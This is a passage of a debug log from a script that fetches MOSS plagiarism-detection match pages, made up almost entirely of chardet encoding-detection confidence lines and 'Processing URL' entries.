active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5338923655373736\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match66-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match66-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match66-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match69-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match69-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match69-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match71-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match71-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match71-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19085\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21642\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19072\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40756\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21629\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 15948\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19085\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21642\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 15935\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19072\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40743\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 15948\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21629\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19072\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40756\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 15935\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21629\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19073\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40743\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 15935\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19072\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21630\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 15936\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40743\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21629\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 15935\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5450726049544079\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40744\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5470645576093004\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5322320954044778\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match68-top.html\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40743\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5572202123261181\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match68-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match68-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match77-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match77-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match77-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match78-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match78-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match78-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match79-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match79-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match79-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19085\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19072\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19085\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20101\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19072\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19072\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20088\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19073\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16309\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20101\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19072\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16296\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20088\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16309\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20088\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16296\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5450726049544079\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16296\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20089\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16297\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16296\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20088\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5472988216411365\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5516082579026649\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match72-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match72-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match72-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match75-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match75-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match75-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match73-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match73-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match73-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match76-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17439\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19937\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17426\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19924\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 31460\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17439\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19937\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17426\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 31447\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19924\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17426\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 31460\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17427\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19924\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 31447\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17426\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19925\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 31447\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19924\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 31448\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 31447\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5251957085109056\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5264956214254594\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5587207154234618\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match76-0.html\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match76-1.html\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 